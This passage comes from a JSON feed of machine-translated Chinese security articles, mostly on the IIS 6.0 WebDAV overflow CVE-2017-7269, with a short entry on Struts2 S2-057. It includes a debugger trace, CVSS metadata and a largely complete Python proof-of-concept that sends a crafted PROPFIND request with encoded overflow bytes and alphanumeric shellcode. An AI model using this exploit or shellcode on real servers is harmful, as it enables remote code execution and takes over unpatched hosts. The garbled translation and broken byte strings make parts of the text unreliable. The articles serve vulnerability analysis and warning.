XE3\\x9d\\x85\\xe4\\xb5\\x89\\xe5\\x9d\\x8e\\xe5\\x91\\x88\\xe4\\xb0\\xb8\\the XE3\\x99\\xba\\the XE3\\x95\\xb2\\xe6\\x89\\xa6\\xe6\\xb9\\x83\\xe4\\xa1\\xad\\the XE3\\x95\\x88\\xe6\\x85\\xb7\\xe4\\xb5\\x9a\\xe6\\x85\\xb4\\xe4\\x84\\xb3\\xe4\\x8d\\xa5\\xe5\\x89\\xb2\\xe6\\xb5\\xa9\\the XE3\\x99\\xb1\\ xe4\\xb9\\xa4\\xe6\\xb8\\xb9\\xe6\\x8d\\x93\\xe6\\xad\\xa4\\xe5\\x85\\x86\\xe4\\xbc\\xb0\\xe7\\xa1\\xaf\\xe7\\x89\\x93\\xe6\\x9d\\x90\\xe4\\x95\\x93\\xe7\\xa9\\xa3\\xe7\\x84\\xb9\\xe4\\xbd\\x93\\xe4\\x91\\x96\\xe6\\xbc\\xb6\\xe7\\x8d\\xb9\\xe6\\xa1\\xb7\\xe7\\xa9\\x96\\xe6\\x85\\x8a\\the XE3\\xa5\\x85\\ the XE3\\x98\\xb9\\xe6\\xb0\\xb9\\xe4\\x94\\xb1\\the XE3\\x91\\xb2\\xe5\\x8d\\xa5\\xe5\\xa1\\x8a\\xe4\\x91\\x8e\\xe7\\xa9\\x84\\xe6\\xb0\\xb5\\xe5\\xa9\\x96\\xe6\\x89\\x81\\xe6\\xb9\\xb2\\xe6\\x98\\xb1\\xe5\\xa5\\x99\\xe5\\x90\\xb3\\the XE3\\x85\\x82\\xe5\\xa1\\xa5\\xe5\\xa5\\x81\\xe7\\x85\\x90\\the XE3\\x80\\xb6\\ xe5\\x9d\\xb7\\xe4\\x91\\x97\\xe5\\x8d\\xa1\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe6\\xb9\\x8f\\xe6\\xa0\\x80\\xe6\\xb9\\x8f\\xe6\\xa0\\x80\\xe4\\x89\\x87\\xe7\\x99\\xaa\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe4\\x89\\x97\\xe4\\xbd\\xb4\\xe5\\xa5\\x87\\xe5\\x88\\xb4\\xe4\\xad\\xa6\\xe4\\xad\\x82\\xe7\\x91\\xa4\\ xe7\\xa1\\xaf\\xe6\\x82\\x82\\xe6\\xa0\\x81\\xe5\\x84\\xb5\\xe7\\x89\\xba\\xe7\\x91\\xba\\xe4\\xb5\\x87\\xe4\\x91\\x99\\xe5\\x9d\\x97\\xeb\\x84\\x93\\xe6\\xa0\\x80\\the XE3\\x85\\xb6\\xe6\\xb9\\xaf\\xe2\\x93\\xa3\\xe6\\xa0\\x81\\xe1\\x91\\xa0\\xe6\\xa0\\x83\\xcc\\x80\\xe7\\xbf\\xbe\\xef\\xbf\\xbf\\xef\\xbf\\xbf\\xe1\\x8f\\x80\\ xe6\\xa0\\x83\\xd1\\xae\\xe6\\xa0\\x83\\xe7\\x85\\xae\\xe7\\x91\\xb0\\xe1\\x90\\xb4\\xe6\\xa0\\x83\\xe2\\xa7\\xa7\\xe6\\xa0\\x81\\xe9\\x8e\\x91\\xe6\\xa0\\x80\\the XE3\\xa4\\xb1\\xe6\\x99\\xae\\xe4\\xa5\\x95\\the XE3\\x81\\x92\\xe5\\x91\\xab\\xe7\\x99\\xab\\xe7\\x89\\x8a\\xe7\\xa5\\xa1\\xe1\\x90\\x9c\\xe6\\ xa0\\x83\\xe6\\xb8\\x85\\xe6\\xa0\\x80\\xe7\\x9c\\xb2\\xe7\\xa5\\xa8\\xe4\\xb5\\xa9\\the XE3\\x99\\xac\\xe4\\x91\\xa8\\xe4\\xb5\\xb0\\xe8\\x89\\x86\\xe6\\xa0\\x80\\xe4\\xa1\\xb7\\the XE3\\x89\\x93\\xe1\\xb6\\xaa\\xe6\\xa0\\x82\\xe6\\xbd\\xaa\\xe4\\x8c\\xb5\\xe1\\x8f\\xb8\\xe6\\xa0\\x83\\xe2\\xa7\\xa7\\xe6\\ xa0\\x81' \n\n\n**[1] [[2]](<84747_2.htm>) [next](<84747_2.htm>)**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-29T00:00:00", "type": "myhack58", "title": "IIS 6.0 exposure remote code execution vulnerability CVE-2017-7269-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7269"], "modified": "2017-03-29T00:00:00", "id": "MYHACK58:62201784747", "href": "http://www.myhack58.com/Article/html/3/62/2017/84747.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-04-01T05:21:38", "description": "Author: k0shl reprint please indicate the source author of the blog: http://whereisk0shl.top\n\n### Preface\n\nCVE-2017-7269 IIS 6.0 in the presence of a stack overflow vulnerability in IIS6. 0 processing PROPFIND command when, due to the length of the url without the effective length of the control and inspection lead to the implementation of memcpy on a virtual path configuration when the trigger stack overflow, this vulnerability can lead to remote code execution.\n\nCurrently on github there is one in windows server 2003 r2 on the stable use of the exploit, this exp the current implementation of the function is playing the calculator, and use the shellcode method is the alpha shellcode, this is due to the url in memory to the width of the bytes stored in the form, and which contains some of the badchar, making it impossible to directly use the shellcode code execution, and require first order alpha shellcode method, in ascii form to the width of the byte write to memory, and then through a small section after decrypting the execution code.\n\ngithub address: https://github.com/edwardz246003/IIS_exploit\n\nThis vulnerability is in fact the principle is very simple, but its use method is very interesting, I'm in the start when debugging a lot of stack overflow and exp, but most are covered by a ret, overwrite the seh and other methods to complete the attack, until I saw this exploit, feeling very artistic. But this vulnerability is also present its limitations, such as for aslr seems to have no use of the surface, and therefore in a higher version of windows server in use seems to be very difficult, the windows server 2003 r2 without aslr protection.\n\nIn this article, I will first briefly explain the vulnerability of the use case; then, I will and everyone together to analyze this vulnerability causes; then I will give you a detailed description of this exploits, and finally I will briefly examine the vulnerability of the rop and shellcode is.\n\nI'm a rookie, as there are irregularities, but also hope you get to correct me, thanks for reading!\n\n### Bouncing bomb--a word substandard on the\u201cbullet\u201dcalculator\n\n#### Vulnerability environment to build\n\nThe vulnerability of the environment of the build is very simple, my environment is windows server 2003 r2 32-bit English Corporate Edition, installed after the need to enter the system to configure the iis6. 0, first in the login windows, select the configuration server, the installation of iis6. 0 service, after entering the iis6. 0 Manager, In Manager, there is a windows extension, in the extension there is a webdav option, the default is to enter the state, on the left side choose allow, turn on the webdav, and then after the iis Manager the default Web page to create a virtual directory in this step does not matter, and then select run->services. msc->the WebClient service, which is open, so to complete my configuration.\n\n#### To trigger the vulnerability\n\nThe vulnerability trigger is very simple, directly in the local implementation of python exp. py can be, here in order to observe the process, I modify the exp, The it into the remote, we go through the wireshark capture, you can see and the target machine interactions.\n\n! [](/Article/UploadPic/2017-4/20174111131240. png)\n\nYou can see, the attacking host to the target machine sends a PROPFIND packet, this is responsible for the webdav processing of an instruction, which contains our attack data, a<>includes two Extra-Long httpurl request, wherein the two http url in the middle there is a lock token of the instruction content.\n\nThen we can see that in the drone to perform the calc, which is the process of creating in the w2wp process, the user group is a NETWORK SERVICE.\n\n! [](/Article/UploadPic/2017-4/20174111132235. png)\n\nI in the beginning thought that this calc is due to the SW_HIDE parameter settings lead to run in the background, and later find out it was due to the webdav service process itself is no window, led to calc even define SW_SHOWNORMAL, also just started in the background.\n\nIn fact, this vulnerability in a timely manner not later< a>of the http url, an IF:<>can also be a trigger, and the reason for adding the second<>as well as the lock token, is because the author wanted to use the first and second http request to complete an exquisite use of, and finally in the instructions to complete the final blow.\n\nI try to remove the second<>as well as request, also can cause the iis services to crash.\n\n! [](/Article/UploadPic/2017-4/20174111132202. png)\n\n### CVE-2017-7269 vulnerability analysis\n\nThis vulnerability causes the WebDav service Dynamic Link Library httpext. dll ScStorageFromUrl function, here for convenience, we directly to track and analyze the function, in the next section, I will look at the whole subtle use of the process. I will be the first dynamic analysis of the entire process, and then patch the vulnerability function of the pseudo-code.\n\nIn ScStorageFromUrl function, first will call ScStripAndCheckHttpPrefix Function, This function is mainly to obtain the head information to be checked and the host name to be checked.\n\n\n0:009> p//call CchUrlPrefixW get the url header information\neax=67113bc8 ebx=00fffbe8 ecx=00605740 edx=00fff4f8 esi=0060c648 edi=00605740\neip=671335f3 esp=00fff4b4 ebp=00fff4d0 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\nhttpext! ScStripAndCheckHttpPrefix+0x1e:\n671335f3 ff5024 call dword ptr [eax+24h] ds:0023:67113bec={httpext! CEcbBaseImpl<IEcb>::CchUrlPrefixW (6712c72a)}\n0:009> p\neax=00000007 ebx=00fffbe8 ecx=00fff4cc edx=00fff4f8 esi=0060c648 edi=00605740\neip=671335f6 esp=00fff4b8 ebp=00fff4d0 iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\nhttpext! ScStripAndCheckHttpPrefix+0x21:\n671335f6 8bd8 mov ebx,eax\n0:009> dc esi l6//esi stored header information, as well as the server name, the localhost will later get to.\n0060c648 00740068 00700074 002f003a 006c002f h. t. t. p.:././. l.\n0060c658 0063006f 006c0061 o. c. a. l.\n\nCheck the complete http header and a hostname, calls wlen function to get the current http url length.\n\n\n0:009> p\neax=0060e7d0 ebx=0060b508 ecx=006058a8 edx=0060e7d0 esi=00605740 edi=00000000\neip=67126ce8 esp=00fff330 ebp=00fff798 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\nhttpext! ScStoragePathFromUrl+0x6d:\n67126ce8 50 push eax\n0:009> p\neax=0060e7d0 ebx=0060b508 ecx=006058a8 edx=0060e7d0 esi=00605740 edi=00000000\neip=67126ce9 esp=00fff32c ebp=00fff798 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\nhttpext! ScStoragePathFromUrl+0x6e:\n67126ce9 ff1550121167 call dword ptr [httpext!_ imp__wcslen (67111250)] ds:0023:67111250={applications like! wcslen (77bd8ef2)}\n0:009> r eax\neax=0060e7d0\n0:009> dc eax\n0060e7d0 0062002f 00620062 00620062 00620062 /. b. b. b. b. b. b. b.\n0060e7e0 61757948 6f674f43 48456b6f 67753646 HyuaCOgookEHF6ug\n0060e7f0 38714433 5a625765 56615435 6a536952 3Dq8eWbZ5TaVRiSj\n0060e800 384e5157 63555948 43644971 34686472 WQN8HYUcqIdCrdh4\n0060e810 71794758 6b55336b 504f6d48 34717a46 XGyqk3UkHmOPFzq4\n0060e820 74436f54 6f6f5956 34577341 7a726168 ToCtVYooAsW4harz\n0060e830 4d493745 5448574e 367a4c38 62663572 E7IMNWHT8Lz6r5fb\n0060e840 486d6e43 61773548 61744d5a 43654133 CnmHH5waZMta3AeC\n0:009> p\neax=000002fd ebx=0060b508 ecx=00600000 edx=0060e7d0 esi=00605740 edi=00000000\neip=67126cef esp=00fff32c ebp=00fff798 iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\nhttpext! ScStoragePathFromUrl+0x74:\n67126cef 59 pop ecx\n0:009> r eax\neax=000002fd\n\n**[1] [[2]](<84836_2.htm>) [[3]](<84836_3.htm>) [[4]](<84836_4.htm>) [[5]](<84836_5.htm>) [[6]](<84836_6.htm>) [[7]](<84836_7.htm>) [[8]](<84836_8.htm>) [next](<84836_2.htm>)**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-01T00:00:00", "type": "myhack58", "title": "CVE-2017-7269 IIS6. 0 remote code execution vulnerability analysis and Exploit-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7269"], "modified": "2017-04-01T00:00:00", "id": "MYHACK58:62201784836", "href": "http://www.myhack58.com/Article/html/3/62/2017/84836.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-23T14:31:18", "description": "It is possible to perform a RCE attack when the namespace value isn't set for a result defined in underlying xml configurations and in the same time, its upper action(s) configurations have no or wildcard namespace. The Same possibility when using the url tag which doesn't have value and action set and in the same time, its upper action(s) configurations have no or wildcard namespace. -- Apache Struts2 Team \n2018 8 May 23, Apache Strust2 released the latest security Bulletin, the Apache Struts2 there is a remote code execution of high-risk vulnerability by Semmle Security Research team of security researchers reporting vulnerabilities number of CVE-2018-11776\uff08S2-057 in. Struts2 in XML configuration, if the namespace value is not set and the Action Configuration is not set or wildcard namespace may lead to remote code execution. \n\n0x01 vulnerability affect \nAffect \nDetermining CVE-2018-11776 as a high-risk vulnerability. \nThe actual scene there are some limitations that need to meet certain conditions. \nImpact version \nStruts 2.3 to 2.3.34 \nThe Struts 2.5 to 2.5.16 \nFix version \nThe Struts 2.3.35 \nThe Struts 2.5.17 \n\n0x02 vulnerability verification \n! [](/Article/UploadPic/2018-8/2018823153240150. png) \nIncoming OGNL expression${2333+2333} \n! [](/Article/UploadPic/2018-8/2018823153240244. png) \nSuccess with the execution of the function, and perform \n! [](/Article/UploadPic/2018-8/2018823153240318. png) \nReturns the result to the URL \n\n0x03 repair recommendations \nThe official recommended to upgrade the Struts to 2. 3. 35 version or 2. 5. 17 version \nThe updated version there are no compatibility issues \n\n0x04 timeline \n2018-08-22 vulnerability disclosure \n2018-08-22 360CERT publish early warning analysis advertisement \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T00:00:00", "type": "myhack58", "title": "Apache Struts2 S2-057 vulnerability analysis and early warning-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-23T00:00:00", "id": "MYHACK58:62201891267", "href": "http://www.myhack58.com/Article/html/3/62/2018/91267.htm", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-04-08T07:27:05", "description": "Author: Vulntor\n\nDate: 2017/03/29\n\n0x00 Preface\n\nYesterday broke the iis6. 0 Vulnerability, CVE-2017-7269 of the poc so many web Dog miserable.\n\nAs a web dog, I also naive to think that a calculator will pop-up, in fact, the process already appeared to calc. exe process, but it does not appear the window.\n\nHowever open the calculator can only do Local Authentication to execute arbitrary code on the need for the author to POC shellcode construct for analysis.\n\nNext to web dog's perspective for analysis.\n\n0x01 analysis and results\n\nFirst look at the poc code\n\nimport socket \n\nsock = socket. socket(socket. AF_INET, socket. SOCK_STREAM) \n\nsock. connect(('127.0.0.1',80)) \n\npay='PROPFIND / HTTP/1.1\\r\\nHost: localhost\\r\\nContent-Length: 0\\r\\n' \n\npay+='If: <http://localhost/aaaaaaa' \n\npay+='\\xe6\\xbd\\xa8\\xe7\\xa1\\xa3\\xe7\\x9d\\xa1\\xe7\\x84\\xb3\\xe6\\xa4\\xb6\\xe4\\x9d\\xb2\\xe7\\xa8\\xb9\\xe4\\xad\\xb7\\xe4\\xbd\\xb0\\xe7\\x95\\x93\\xe7\\xa9\\x8f\\xe4\\xa1\\xa8\\xe5\\x99\\xa3\\xe6\\xb5\\x94\\xe6\\xa1\\x85\\the XE3\\xa5\\x93\\xe5\\x81\\xac\\xe5\\x95\\xa7\\xe6\\x9d\\xa3\\ the XE3\\x8d\\xa4\\xe4\\x98\\xb0\\xe7\\xa1\\x85\\xe6\\xa5\\x92\\xe5\\x90\\xb1\\xe4\\xb1\\x98\\xe6\\xa9\\x91\\xe7\\x89\\x81\\xe4\\x88\\xb1\\xe7\\x80\\xb5\\xe5\\xa1\\x90\\the XE3\\x99\\xa4\\xe6\\xb1\\x87\\the XE3\\x94\\xb9\\xe5\\x91\\xaa\\xe5\\x80\\xb4\\xe5\\x91\\x83\\xe7\\x9d\\x92\\xe5\\x81\\xa1\\the XE3\\x88\\xb2\\ xe6\\xb5\\x8b\\xe6\\xb0\\xb4\\the XE3\\x89\\x87\\xe6\\x89\\x81\\the XE3\\x9d\\x8d\\xe5\\x85\\xa1\\xe5\\xa1\\xa2\\xe4\\x9d\\xb3\\xe5\\x89\\x90\\the XE3\\x99\\xb0\\xe7\\x95\\x84\\xe6\\xa1\\xaa\\the XE3\\x8d\\xb4\\xe4\\xb9\\x8a\\xe7\\xa1\\xab\\xe4\\xa5\\xb6\\xe4\\xb9\\xb3\\xe4\\xb1\\xaa\\xe5\\x9d\\xba\\xe6\\xbd\\xb1\\ xe5\\xa1\\x8a\\the XE3\\x88\\xb0\\the XE3\\x9d\\xae\\xe4\\xad\\x89\\xe5\\x89\\x8d\\xe4\\xa1\\xa3\\xe6\\xbd\\x8c\\xe7\\x95\\x96\\xe7\\x95\\xb5\\xe6\\x99\\xaf\\xe7\\x99\\xa8\\xe4\\x91\\x8d\\xe5\\x81\\xb0\\xe7\\xa8\\xb6\\xe6\\x89\\x8b\\xe6\\x95\\x97\\xe7\\x95\\x90\\xe6\\xa9\\xb2\\xe7\\xa9\\xab\\xe7\\x9d\\xa2\\ xe7\\x99\\x98\\xe6\\x89\\x88\\xe6\\x94\\xb1\\the XE3\\x81\\x94\\xe6\\xb1\\xb9\\xe5\\x81\\x8a\\xe5\\x91\\xa2\\xe5\\x80\\xb3\\the XE3\\x95\\xb7\\xe6\\xa9\\xb7\\xe4\\x85\\x84\\the XE3\\x8c\\xb4\\xe6\\x91\\xb6\\xe4\\xb5\\x86\\xe5\\x99\\x94\\xe4\\x9d\\xac\\xe6\\x95\\x83\\xe7\\x98\\xb2\\xe7\\x89\\xb8\\xe5\\x9d\\xa9\\ xe4\\x8c\\xb8\\xe6\\x89\\xb2\\xe5\\xa8\\xb0\\xe5\\xa4\\xb8\\xe5\\x91\\x88\\xc8\\x82\\xc8\\x82\\xe1\\x8b\\x80\\xe6\\xa0\\x83\\xe6\\xb1\\x84\\xe5\\x89\\x96\\xe4\\xac\\xb7\\xe6\\xb1\\xad\\xe4\\xbd\\x98\\xe5\\xa1\\x9a\\xe7\\xa5\\x90\\xe4\\xa5\\xaa\\xe5\\xa1\\x8f\\xe4\\xa9\\x92\\xe4\\x85\\x90\\xe6\\x99\\ x8d\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe4\\xa0\\xb4\\xe6\\x94\\xb1\\xe6\\xbd\\x83\\xe6\\xb9\\xa6\\xe7\\x91\\x81\\xe4\\x8d\\xac\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe5\\x8d\\x83\\xe6\\xa9\\x81\\xe7\\x81\\x92\\the XE3\\x8c\\xb0\\xe5\\xa1\\xa6\\xe4\\x89\\x8c\\xe7\\x81\\x8b\\xe6\\x8d\\x86\\xe5\\x85\\xb3\\xe7\\xa5\\ x81\\xe7\\xa9\\x90\\xe4\\xa9\\xac' \n\npay+='>' \n\npay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb' \n\npay+='\\xe7\\xa5\\x88\\xe6\\x85\\xb5\\xe4\\xbd\\x83\\xe6\\xbd\\xa7\\xe6\\xad\\xaf\\xe4\\xa1\\x85\\the XE3\\x99\\x86\\xe6\\x9d\\xb5\\xe4\\x90\\xb3\\the XE3\\xa1\\xb1\\xe5\\x9d\\xa5\\xe5\\xa9\\xa2\\xe5\\x90\\xb5\\xe5\\x99\\xa1\\xe6\\xa5\\x92\\xe6\\xa9\\x93\\xe5\\x85\\x97\\the XE3\\xa1\\x8e\\xe5\\xa5\\x88\\ xe6\\x8d\\x95\\xe4\\xa5\\xb1\\xe4\\x8d\\xa4\\xe6\\x91\\xb2\\the XE3\\x91\\xa8\\xe4\\x9d\\x98\\xe7\\x85\\xb9\\the XE3\\x8d\\xab\\xe6\\xad\\x95\\xe6\\xb5\\x88\\xe5\\x81\\x8f\\xe7\\xa9\\x86\\the XE3\\x91\\xb1\\xe6\\xbd\\x94\\xe7\\x91\\x83\\xe5\\xa5\\x96\\xe6\\xbd\\xaf\\xe7\\x8d\\x81\\the XE3\\x91\\x97\\xe6\\x85\\xa8\\ xe7\\xa9\\xb2\\the XE3\\x9d\\x85\\xe4\\xb5\\x89\\xe5\\x9d\\x8e\\xe5\\x91\\x88\\xe4\\xb0\\xb8\\the XE3\\x99\\xba\\the XE3\\x95\\xb2\\xe6\\x89\\xa6\\xe6\\xb9\\x83\\xe4\\xa1\\xad\\the XE3\\x95\\x88\\xe6\\x85\\xb7\\xe4\\xb5\\x9a\\xe6\\x85\\xb4\\xe4\\x84\\xb3\\xe4\\x8d\\xa5\\xe5\\x89\\xb2\\xe6\\xb5\\xa9\\the XE3\\x99\\xb1\\ xe4\\xb9\\xa4\\xe6\\xb8\\xb9\\xe6\\x8d\\x93\\xe6\\xad\\xa4\\xe5\\x85\\x86\\xe4\\xbc\\xb0\\xe7\\xa1\\xaf\\xe7\\x89\\x93\\xe6\\x9d\\x90\\xe4\\x95\\x93\\xe7\\xa9\\xa3\\xe7\\x84\\xb9\\xe4\\xbd\\x93\\xe4\\x91\\x96\\xe6\\xbc\\xb6\\xe7\\x8d\\xb9\\xe6\\xa1\\xb7\\xe7\\xa9\\x96\\xe6\\x85\\x8a\\the XE3\\xa5\\x85\\ the XE3\\x98\\xb9\\xe6\\xb0\\xb9\\xe4\\x94\\xb1\\the XE3\\x91\\xb2\\xe5\\x8d\\xa5\\xe5\\xa1\\x8a\\xe4\\x91\\x8e\\xe7\\xa9\\x84\\xe6\\xb0\\xb5\\xe5\\xa9\\x96\\xe6\\x89\\x81\\xe6\\xb9\\xb2\\xe6\\x98\\xb1\\xe5\\xa5\\x99\\xe5\\x90\\xb3\\the XE3\\x85\\x82\\xe5\\xa1\\xa5\\xe5\\xa5\\x81\\xe7\\x85\\x90\\the XE3\\x80\\xb6\\ xe5\\x9d\\xb7\\xe4\\x91\\x97\\xe5\\x8d\\xa1\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe6\\xb9\\x8f\\xe6\\xa0\\x80\\xe6\\xb9\\x8f\\xe6\\xa0\\x80\\xe4\\x89\\x87\\xe7\\x99\\xaa\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe4\\x89\\x97\\xe4\\xbd\\xb4\\xe5\\xa5\\x87\\xe5\\x88\\xb4\\xe4\\xad\\xa6\\xe4\\xad\\x82\\xe7\\x91\\xa4\\ xe7\\xa1\\xaf\\xe6\\x82\\x82\\xe6\\xa0\\x81\\xe5\\x84\\xb5\\xe7\\x89\\xba\\xe7\\x91\\xba\\xe4\\xb5\\x87\\xe4\\x91\\x99\\xe5\\x9d\\x97\\xeb\\x84\\x93\\xe6\\xa0\\x80\\the XE3\\x85\\xb6\\xe6\\xb9\\xaf\\xe2\\x93\\xa3\\xe6\\xa0\\x81\\xe1\\x91\\xa0\\xe6\\xa0\\x83\\xcc\\x80\\xe7\\xbf\\xbe\\xef\\xbf\\xbf\\xef\\ xbf\\xbf\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xd1\\xae\\xe6\\xa0\\x83\\xe7\\x85\\xae\\xe7\\x91\\xb0\\xe1\\x90\\xb4\\xe6\\xa0\\x83\\xe2\\xa7\\xa7\\xe6\\xa0\\x81\\xe9\\x8e\\x91\\xe6\\xa0\\x80\\the XE3\\xa4\\xb1\\xe6\\x99\\xae\\xe4\\xa5\\x95\\the XE3\\x81\\x92\\xe5\\x91\\xab\\xe7\\x99\\xab\\xe7\\x89\\x8a\\xe7\\xa5\\xa1\\xe1\\x90\\x9c\\xe6\\xa0\\x83\\xe6\\xb8\\x85\\xe6\\xa0\\x80\\xe7\\x9c\\xb2\\xe7\\xa5\\xa8\\xe4\\xb5\\xa9\\the XE3\\x99\\xac\\xe4\\x91\\xa8\\xe4\\xb5\\xb0\\xe8\\x89\\x86\\xe6\\xa0\\x80\\xe4\\xa1\\xb7\\the XE3\\x89\\x93\\xe1\\ xb6\\xaa\\xe6\\xa0\\x82\\xe6\\xbd\\xaa\\xe4\\x8c\\xb5\\xe1\\x8f\\xb8\\xe6\\xa0\\x83\\xe2\\xa7\\xa7\\xe6\\xa0\\x81'\n\nshellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA' \n\n**[1] [[2]](<85050_2.htm>) [[3]](<85050_3.htm>) [[4]](<85050_4.htm>) [[5]](<85050_5.htm>) [[6]](<85050_6.htm>) [[7]](<85050_7.htm>) [[8]](<85050_8.htm>) [[9]](<85050_9.htm>) [[10]](<85050_10.htm>) [next](<85050_2.htm>)**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-08T00:00:00", "type": "myhack58", "title": "IIS6. 0 remote command execution shellcode construct-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7269"], "modified": "2017-04-08T00:00:00", "id": "MYHACK58:62201785050", "href": "http://www.myhack58.com/Article/html/3/62/2017/85050.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-06T03:41:54", 